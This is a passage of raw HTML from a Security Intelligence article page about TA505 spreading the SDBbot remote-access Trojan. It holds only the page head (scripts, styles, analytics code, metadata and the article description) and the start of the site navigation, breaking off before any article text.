TA505 Continues to Infect Networks With SDBbot RAT

<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1">  <title>TA505 Continues to Infect Networks With SDBbot RAT</title>   <meta name="theme-color" content="#000000">  <meta name="referrer" content="no-referrer-when-downgrade">   <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)">  <script> window._ibmAnalytics = { "settings": { "name": "SecurityIntelligence", "tealiumProfileName": "ibm-subsidiary" }, "digitalData.page.services.google.enabled": true }; window.digitalData = { "page": { "pageInfo": { "effectiveDate": "2020-04-14", "publishDate": "2020-04-14", "ibm": { "siteId": "IBM_" + _ibmAnalytics.settings.name, } }, "category": { "primaryCategory": "PC090" } } }; // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } // }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script>  <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630">  <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel="alternate" type="application/rss+xml" title="Security Intelligence » TA505 Continues to Infect Networks With SDBbot RAT Comments Feed" href="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.7.1" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/ibm_internals/418017" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel='shortlink' href='https://securityintelligence.com/?p=418017' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fposts%2Fta505-continues-to-infect-networks-with-sdbbot-rat%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fposts%2Fta505-continues-to-infect-networks-with-sdbbot-rat%2F&format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/plex.css');</style><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1734627165">   <meta name="description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="TA505 Continues to Infect Networks With SDBbot RAT" /> <meta property="og:description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware." /> <meta property="og:url" content="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Command-and-Control (C&C)" /> <meta property="article:tag" content="Cybercrime" /> <meta property="article:tag" content="Macros" /> <meta property="article:tag" content="Malware" /> <meta property="article:tag" content="Malware Analysis" /> <meta property="article:tag" content="Open Source" /> <meta property="article:tag" content="Remote-Access Trojan (RAT)" /> <meta property="article:tag" content="Targeted Attacks" /> <meta property="article:tag" content="Threat Intelligence" /> <meta property="article:tag" content="Trojan" /> <meta property="article:tag" content="X-Force" /> <meta property="article:section" content="Advanced Threats" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="629" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware." /> <meta name="twitter:title" content="TA505 Continues to Infect Networks With SDBbot RAT" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg","width":1200,"height":629,"caption":"A security analyst conducts research on Hive0065's SDBbot RAT"},{"@type":"WebPage","@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#webpage","url":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/","name":"TA505 Continues to Infect Networks With SDBbot RAT","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#primaryimage"},"datePublished":"2020-04-14T10:00:27+00:00","dateModified":"2021-02-02T14:55:09+00:00","description":"IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware."}]}</script>  </head> <body class="si_body" > <nav id="navigation" class="navigation navigation--homepage " aria-label="Security Intelligence"> <div class="container"> <div class="row">  <div class="navigation__brand"> <a href="https://securityintelligence.com" title="Security Intelligence" tabindex="1"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence Logo"> <div fallback> <h6>Security Intelligence</h6> </div> </amp-img> </a> </div>  <div class="navigation__menu" onmouseleave="delete localStorage['megamenu-status']"> <a tabindex="2" id="nav-news" href="/news/" class="navigation__button " data-menu="megamenu__news" onclick="localStorage['megamenu-status'] = 'first-interaction';">News</a> <a tabindex="4" id="nav-topics" href="/category/topics/" class="navigation__button " data-menu="megamenu__topics" onclick="localStorage['megamenu-status'] = 'first-interaction';">Topics</a> <a tabindex="5" id="nav-x-force" href="/x-force/" class="navigation__button " data-menu="megamenu__threat" onclick="localStorage['megamenu-status'] = 'first-interaction';">X-Force</a> <a tabindex="6" id="nav-media" href="/media/" class="navigation__button " data-menu="megamenu__podcast" onclick="localStorage['megamenu-status'] = 'first-interaction';">Podcast</a> <button aria-label="search Button" class="navigation__search" onclick="document.getElementById('search__input').focus()" on="tap:search.toggleClass(class='megamenu__open')" role="link" tabindex="-1" type="button"> <amp-img tabindex="7" width="24" height="24" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/search.svg" alt="Click to open the search bar"></amp-img> </button> </div>  <div id="search-tablet" class="navigation__menu navigation__menu--tablet" tabindex="-1"> <button type="button" class="navigation__button " data-menu="megamenu__news">News</button> <button type="button" class="navigation__button " data-menu="megamenu__topics" on="tap:megamenu__news.hide, megamenu__series.hide, megamenu__topics.show, megamenu__industries.hide, megamenu__threat.hide, megamenu__podcast.hide, megamenu__events.hide, megamenu__mask.show" role="link" tabindex="0">Topics</button> <button type="button" class="navigation__button " 